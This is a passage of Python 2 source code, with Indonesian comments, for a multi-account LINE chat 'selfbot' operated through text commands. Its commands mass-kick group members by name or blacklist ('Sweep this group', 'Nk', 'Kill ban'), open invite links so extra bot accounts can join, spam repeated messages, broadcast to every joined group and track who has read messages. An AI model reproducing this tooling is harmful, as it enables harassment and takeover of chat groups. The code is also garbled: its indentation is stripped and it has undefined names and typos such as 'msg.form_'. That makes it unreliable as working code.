cl.sendText(msg.to,"It can't be used besides the group.")
elif "Kick " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Kick ","")
cl.kickoutFromGroup(msg.to,[midd])
elif "Invite " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Invite ","")
cl.findAndAddContactsByMid(midd)
cl.inviteIntoGroup(msg.to,[midd])
elif "inv: " in msg.text:
if msg.from_ in admin:
gid = msg.text.replace("inv: ","")
if gid == "":
cl.sendText(msg.to,"invalid group id.")
else:
try:
cl.findAndAddContactsByMid(msg.from_)
cl.inviteIntoGroup(gid,[msg.from_])
cl.sendText(msg.to,"invited.")
except:
cl.sendText(msg.to,"you are has been invited.")
elif "leave: " in msg.text:
if msg.from_ in admin:
gid = msg.text.replace("leave: ","")
if gid == "":
cl.sendText(msg.to,"invalid group id.")
else:
try:
cl.leaveGroup(gid)
cl.sendText(msg.to,"Bot leaving the group.")
except:
cl.sendText(msg.to,"Bot has left the group.")
elif msg.text in ["Bot?"]:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid}
ki.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Bmid}
kk.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Cmid}
kc.sendMessage(msg)
elif msg.text in ["Creator","creator"]:
msg.contentType = 13
cl.sendText(msg.to, "Created By: BABANG_Adhi")
msg.contentMetadata = {'mid': 'u350cc7408cc6cc82e056ee046131f925'}
cl.sendMessage(msg)
elif msg.text in ["Me"]:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.from_}
cl.sendMessage(msg)
elif msg.text in ["愛�プレゼント","Gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '5'}
msg.text = None
cl.sendMessage(msg)
elif msg.text in ["Cancel","cancel"]:
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
if X.invitee is not None:
gInviMids = [contact.mid for contact in X.invitee]
cl.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"No one is inviting")
else:
cl.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
#elif "gurl" == msg.text:
#print cl.getGroup(msg.to)
##cl.sendMessage(msg)
elif msg.text in ["Open url","open url"]:
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invite by link open")
else:
cl.sendText(msg.to,"Already open")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Close url","close url"]:
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = True
cl.updateGroup(X)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invite by link Close")
else:
cl.sendText(msg.to,"Already close")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text == "Ginfo":
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
gCreator = ginfo.creator.displayName
except:
gCreator = "Error"
if wait["lang"] == "JP":
if ginfo.invitee is None:
sinvitee = "0"
else:
sinvitee = str(len(ginfo.invitee))
if ginfo.preventJoinByTicket == True:
u = "close"
else:
u = "open"
cl.sendText(msg.to,"group name :\n" + str(ginfo.name) + "\n\ngid :\n" + msg.to + "\n\ngroup creator :\n" + gCreator + "\n\nprofile status :\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus + "\n\nmembers : " + str(len(ginfo.members)) + " members\npending : " + sinvitee + " people\nQR/Link : " + u + " it is inside")
else:
cl.sendText(msg.to,"group name :\n" + str(ginfo.name) + "\n\ngid :\n" + msg.to + "\n\ngroup creator :\n" + gCreator + "\n\nprofile status :\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus + "\n\nmembers : " + str(len(ginfo.members)) + " members\npending : " + sinvitee + " people\nQR/Link : " + u + " it is inside")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text.lower() == "id group":
cl.sendText(msg.to,msg.to)
elif msg.text.lower() == "my mid":
cl.sendText(msg.to, msg.from_)
elif msg.text.lower() == "Mid all":
if msg.from_ in admin:
cl.sendText(msg.to,mid)
ki.sendText(msg.to,Amid)
kk.sendText(msg.to,Bmid)
kc.sendText(msg.to,Cmid)
elif msg.text in ["Wkwkwk","Wkwk","Wk","wkwkwk","wkwk","wk"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "100",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
elif msg.text in ["Hehehe","Hehe","He","hehehe","hehe","he"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "10",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
elif msg.text in ["Galau"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "9",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["You"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "7",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Hadeuh"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "6",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Please"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "4",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Haaa"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "3",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Lol"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "110",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Hmmm","Hmm","Hm","hmmm","hmm","hm"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "101",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
elif msg.text in ["Welcome"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "247",
"STKPKGID": "3",
"STKVER": "100" }
ki.sendMessage(msg)
elif msg.text in ["TL: "]:
if msg.from_ in admin:
tl_text = msg.text.replace("TL: ","")
cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
elif msg.text in ["Mc "]:
mmid = msg.text.replace("Mc ","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
cl.sendMessage(msg)
elif msg.text in ["Joinn on","joinn on"]:
if msg.from_ in admin:
if wait["Protectjoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"kick Joined Group On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectjoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"kick Joined Group On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Joinn off","joinn off"]:
if msg.from_ in admin:
if wait["Protectjoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"kick Joined Group Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectjoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"kick Joined Group Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Cancl on","cancl on"]:
if msg.from_ in admin:
if wait["Protectcancl"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel All Invited On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel All Invited On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Cancl off","cancl off"]:
if msg.from_ in admin:
if wait["Protectcancl"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel All Invited Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel All Invited Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Gr on","gr on"]:
if msg.from_ in admin:
if wait["Protectgr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect Group On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectgr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect Group On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Gr off","gr off"]:
if msg.from_ in admin:
if wait["Protectgr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect Group Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectgr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect Group Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Contact On","Contact on","contact on"]:
if msg.from_ in admin:
if wait["contact"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Send Contact On")
else:
cl.sendText(msg.to,"done")
else:
wait["contact"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Send Contact On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Contact Off","Contact off","contact off"]:
if msg.from_ in admin:
if wait["contact"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Send Contact Off")
else:
cl.sendText(msg.to,"done")
else:
wait["contact"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Send Contact Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["自動å�‚åŠ :オン","Join on","Auto join:on","自動å�ƒåŠ ï¼šé–‹"]:
if msg.from_ in admin:
if wait["autoJoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["autoJoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["自動å�‚åŠ :オフ","Join off","Auto join:off","自動å�ƒåŠ ï¼šé—œ"]:
if msg.from_ in admin:
if wait["autoJoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["autoJoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["共有:オン","Share on","Share on"]:
if msg.from_ in admin:
if wait["timeline"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["timeline"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"�了开。")
elif msg.text in ["共有:オフ","Share off","Share off"]:
if msg.from_ in admin:
if wait["timeline"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["timeline"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦�了关æ–。")
elif msg.text in ["Set","View"]:
if msg.from_ in admin:
md = ""
if wait["Protectjoin"] == True: md+="lock Block Join\n"
else: md+=" Block Join Off\n"
if wait["Protectgr"] == True: md+="lock Block Group\n"
else: md+=" Block Group Off\n"
if wait["Protectcancl"] == True: md+="lock Cancel All Invited\n"
else: md+=" Cancel All Invited Off\n"
if wait["contact"] == True: md+=" Contact : on\n"
else: md+=" Contact : off\n"
if wait["autoJoin"] == True: md+=" Auto join : on\n"
else: md +=" Auto join : off\n"
if wait["autoCancel"]["on"] == True:md+=" Group cancel :" + str(wait["autoCancel"]["members"]) + "\n"
else: md+= " Group cancel : off\n"
if wait["leaveRoom"] == True: md+=" Auto leave : on\n"
else: md+=" Auto leave : off\n"
if wait["timeline"] == True: md+=" Share : on\n"
else:md+=" Share : off\n"
if wait["autoAdd"] == True: md+=" Auto add : on\n"
else:md+=" Auto add : off\n"
if wait["commentOn"] == True: md+=" Comment : on\n"
else:md+=" Comment : off\n"
cl.sendText(msg.to,md)
elif msg.text.lower() in ["Group id"]:
if msg.from_ in admin:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "[ %s ] :\n%s\n\n" % (cl.getGroup(i).name,i)
cl.sendText(msg.to,h)
elif msg.text in ["Cancelall"]:
if msg.from_ in admin:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"All invitations have been refused")
else:
cl.sendText(msg.to,"拒�了全部的邀请。")
elif msg.text in ["Gurl"]:
if msg.from_ in admin:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
cl.updateGroup(x)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text.lower() == 'cek':
cl.sendText(msg.to, "Set point.")
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
now2 = datetime.now()
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('%Y-%m-%d %H:%M')
wait2['ROM'][msg.to] = {}
print wait2
elif msg.text.lower() == 'sider':
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
print rom
chiya += rom[1] + "\n"
cl.sendText(msg.to, "Readers:\n%s\nDate and time:\n[%s]" % (chiya,setTime[msg.to]))
else:
cl.sendText(msg.to, "Type 'cek' to set point.")
#-----------------------------------------------
#-----------------------------------------------
#----------------Fungsi Join Group Start-----------------------#
elif msg.text in ["join","Masuk"]:
if msg.from_ in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.1)
kk.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.1)
kc.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.1)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
print "Bot Complete"
G.preventJoinByTicket(G)
cl.updateGroup(G)
elif msg.text in ["Ard join"]:
if msg.form_ in admin:
x = ki.getGroup(msg.to)
x.preventJoinByTicket = False
ki.updateGroup(x)
invsend = 0
Ti = ki.reissueGroupTicket(msg.to)
cl.acceptGroupInvitationByTicket(msg.to,Ti)
G = ki.getGroup(msg.to)
G.preventJoinByTicket = True
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(msg.to)
elif msg.text in ["Ard1 join"]:
if msg.from_ in admin:
x = cl.getGroup(msg.to)
x.preventJoinByTicket = False
cl.updateGroup(x)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ti)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(msg.to)
elif msg.text in ["Ard2 join"]:
if msg.from_ in admin:
x = cl.getGroup(msg.to)
x.preventJoinByTicket = False
cl.updateGroup(x)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
kk.acceptGroupInvitationByTicket(msg.to,Ti)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(msg.to)
elif msg.text in ["Ard3 join"]:
if msg.from_ in admin:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
kc.acceptGroupInvitationByTicket(msg.to,Ti)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(msg.to)
#----------------------Fungsi Join Group Finish---------------#
#-------------Fungsi Leave Group Start---------------#
elif msg.text in ["Bye bots"]:
if msg.from_ in admin:
if msg.toType == 2:
ginfo = ki.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
kk.leaveGroup(msg.to)
kc.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Bye Ard"]:
if msg.from_ in admin:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
cl.leaveGroup(msg.to)
except:
pass
#-------------Fungsi Leave Group Finish---------------#
#-------------Fungsi Tag All Start---------------#
elif msg.text in ["Hay","Tagall"]:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
cb = ""
cb2 = ""
strt = int(0)
akh = int(0)
for md in nama:
akh = akh + int(6)
cb += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(md)+"},"""
strt = strt + int(7)
akh = akh + 1
cb2 += "@nrik \n"
cb = (cb[:int(len(cb)-1)])
msg.contentType = 0
msg.text = cb2
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'}
try:
cl.sendMessage(msg)
except Exception as error:
print error
#-------------Fungsi Tag All Finish---------------#
#----------------Fungsi Banned Kick Target Start-----------------------#
elif msg.text in ["Kill "]:
if msg.from_ in admin:
if msg.toType == 2:
group = ki.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
kk.sendText(msg.to,"Good Bye")
return
for jj in matched_list:
try:
klist=[ki,kk,kc]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[jj])
print (msg.to,[jj])
except:
pass
#----------------Fungsi Banned Kick Target Finish----------------------#
elif "Sweep this group" in msg.text.lower():
if msg.from_ in admsa:
if msg.toType == 2:
print "sweeping"
_name = msg.text.replace("Sweep this group","")
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
ki.sendText(msg.to,"maaf kalo gak sopan")
kk.sendText(msg.to,"makasih semuanya..")
kc.sendText(msg.to,"hehehhehe")
msg.contentType = 13
msg.contentMetadata = {'mid' :'u350cc7408cc6cc82e056ee046131f925'}
cl.sendMessage(msg)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
ki.sendText(msg.to,"Not found")
else:
for target in targets:
if target not in Bots:
if target not in admin:
try:
klist=[cl,ki,kk,kc]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
pass
#----------------Fungsi Kick User Target Start----------------------#
elif "Nk " in msg.text:
if msg.from_ in admin:
nk0 = msg.text.replace("Nk ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
cl.sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
if targets not in Bots:
if targets not in admin:
try:
klist=[cl,ki,kk,kc]
kicker=random.choice(klist)
ki.sendText(msg.to, "Good bye.")
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
pass
#----------------Fungsi Kick User Target Finish----------------------#
#elif "Blacklist @" in msg.text:
#_name = msg.text.replace("Blacklist @","")
#_kicktarget = _name.rstrip(' ')
#gs = ki2.getGroup(msg.to)
#targets = []
#for g in gs.members:
#if _kicktarget == g.displayName:
#targets.append(g.mid)
#if targets == []:
#cl.sendText(msg.to,"Not found")
#else:
#for target in targets:
#try:
#wait["blacklist"][target] = True
#f=codecs.open('st2__b.json','w','utf-8')
#json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
#k3.sendText(msg.to,"Target locked.")
#except:
#ki.sendText(msg.to,"error")
#----------------Fungsi Banned User Target Start-----------------------#
elif "Ban @" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "[Banned] executed"
_name = msg.text.replace("Ban @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets in Bots:
cl.sendText(msg.to,"Can't ban bot")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Target locked.")
print "[Banned] success"
except:
ki.sendText(msg.to,"Target already in blacklist.")
#----------------Fungsi Banned User Target Finish-----------------------#
#----------------Fungsi Unbanned User Target Start-----------------------#
elif "Unban @" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "[Unban] executed"
_name = msg.text.replace("Unban @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Target not found")
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Target cleaned.")
print "[Unban] success"
except:
ki.sendText(msg.to,"There's no target in blacklist.")
#----------------Fungsi Unbanned User Target Finish-----------------------#
#-------------Fungsi Spam Start---------------------#
elif msg.text in ["Up","up","Up Chat","Up chat","up chat","Upchat","upchat"]:
cl.sendText(msg.to,"squared up!")
cl.sendText(msg.to,"squared up!")
cl.sendText(msg.to,"squared up!")
cl.sendText(msg.to,"squared up!")
cl.sendText(msg.to,"squared up!")
cl.sendText(msg.to,"squared up!")
cl.sendText(msg.to,"squared up!")
cl.sendText(msg.to,"squared up!")
cl.sendText(msg.to,"squared up!")
cl.sendText(msg.to,"squared up!")
cl.sendText(msg.to,"squared up!")
#-------------Fungsi Spam Finish---------------------#
#-------------Fungsi Broadcast Start------------#
elif "Bc " in msg.text:
if msg.from_ in admin:
bctxt = msg.text.replace("Bc ","")
n = cl.getGroupIdsJoined()
for manusia in n:
cl.sendText(manusia, (bctxt))
#--------------Fungsi Broadcast Finish-----------#
elif msg.text in ["Cv say hi"]:
ki.sendText(msg.to,"Hi buddy Har Har")
kk.sendText(msg.to,"Hi buddy Har Har")
kc.sendText(msg.to,"Hi buddy Har Har")
#-----------------------------------------------
elif msg.text in ["dul","dul"]:
cl.sendText(msg.to,"Ya? Type 'help' for help message.")
#-----------------------------------------------
#-------------Fungsi Respon Start---------------------#
elif msg.text in ["Get ready"]:
if msg.from_ in admin:
cl.sendText(msg.to,"I'm ready")
ki.sendText(msg.to,"I'm ready")
kk.sendText(msg.to,"I'm ready")
kc.sendText(msg.to,"I'm ready")
#-------------Fungsi Respon Finish---------------------#
#-------------Fungsi Balesan Respon Finish---------------------#
#-------------Fungsi Speedbot Start---------------------#
elif msg.text in ["Speedbot","speedbot"]:
start = time.time()
cl.sendText(msg.to, "please wait...")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%ss" % (elapsed_time))
#-------------Fungsi Speedbot Finish---------------------#
#-------------Fungsi Banned Send Contact Start------------------#
elif msg.text in ["Ban"]:
if msg.from_ in admin:
wait["wblacklist"] = True
cl.sendText(msg.to,"send contact")
elif msg.text in ["Unban"]:
if msg.from_ in admin:
wait["dblacklist"] = True
cl.sendText(msg.to,"send contact")
#-------------Fungsi Banned Send Contact Finish------------------#
#-------------Fungsi Bannlist Start------------------#
elif msg.text in ["Banlist"]:
if msg.from_ in admin:
if wait["blacklist"] == {}:
cl.sendText(msg.to,"There's no banned user")
else:
ki.sendText(msg.to,"Blacklist user")
mc = ""
for mi_d in wait["blacklist"]:
mc += "->" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
#-------------Fungsi Bannlist Finish------------------#
elif msg.text in ["Cek ban"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
cocoa = ""
for mm in matched_list:
cocoa += mm + "\n"
cl.sendText(msg.to,cocoa + "")
elif msg.text in ["Kill ban"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
cl.sendText(msg.to,"There was no blacklist user")
return
for jj in matched_list:
cl.sendText(msg.to,"Good bye.")
cl.kickoutFromGroup(msg.to,[jj])
ki.kickoutFromGroup(msg.to,[jj])
kk.kickoutFromGroup(msg.to,[jj])
kc.kickoutFromGroup(msg.to,[jj])
elif msg.text in ["Clear"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
cl.cancelGroupInvitation(msg.to,[_mid])
cl.sendText(msg.to,"I pretended to cancel and canceled.")
elif msg.text in ["Bot Like", "Bot like"]:
if msg.from_ in admin:
print "[Command]Like executed"
cl.sendText(msg.to,"Trying to Like post(s)")
try:
likePost()
except:
pass
elif msg.text.lower() == 'ard out all':
if msg.from_ in admsa:
gid = cl.getGroupIdsJoined()
gid = ki.getGroupIdsJoined()
gid = kk.getGroupIdsJoined()
gid = kc.getGroupIdsJoined()
for i in gid:
cl.leaveGroup(i)
ki.leaveGroup(i)
kk.leaveGroup(i)
kc.leaveGroup(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"dudul bot leaving all groups.")
else:
cl.sendText(msg.to,"He declined all invitations")
elif msg.text.lower() == 'ard out':
if msg.from_ in admsa:
gid = cl.getGroupIdsJoined()
for i in gid:
cl.leaveGroup(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Ard bot leaving all groups.")
else:
cl.sendText(msg.to,"He declined all invitations")
elif "Group pict" in msg.text.lower():
print "[command]steal executing"
group = cl.getGroup(msg.to)
path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
cl.sendImageWithURL(msg.to,path)
print "[command]steal executed"
elif "Mid @" in msg.text:
_name = msg.text.replace("Mid @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
cl.sendText(msg.to, g.mid)
else:
pass
elif msg.text.lower() in ["List group"]:
if msg.from_ in admin:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "%s\n" % (cl.getGroup(i).name +" → ["+str(len(cl.getGroup(i).members))+"]")
cl.sendText(msg.to,"-- List Groups --\n\n"+ h +"\nTotal groups =" +" ["+str(len(gid))+"]")
elif "Staff add @" in msg.text:
if msg.from_ in admsa:
print "[Command]Staff add executing"
_name = msg.text.replace("Staff add @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
admin.append(target)
cl.sendText(msg.to,"Staff added")
except:
pass
print "[Command]Staff add executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif "Staff remove @" in msg.text:
if msg.from_ in admsa:
print "[Command]Staff remove executing"
_name = msg.text.replace("Staff remove @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
admin.remove(target)
cl.sendText(msg.to,"Staff deleted")
except:
pass
print "[Command]Staff remove executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif msg.text in ["Stafflist","stafflist"]:
if admin == []:
cl.sendText(msg.to,"The stafflist is empty")
else:
cl.sendText(msg.to,"please wait...")
mc = ""
for mi_d in admin:
mc += "\n- " + cl.getContact(mi_d).displayName
cl.sendText(msg.to, "Staff :\n" + mc)
print "[Command]Stafflist executed"
elif msg.text in ["Kernel","kernel"]:
if msg.from_ in admin:
botKernel = subprocess.Popen(["uname","-svmo"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel)
print "[Command]Kernel executed"
elif "Apakah " in msg.text:
tanya = msg.text.replace("Apakah ","")
jawab = ("Ya","Tidak")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
if op.type == 55:
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n- " + Name
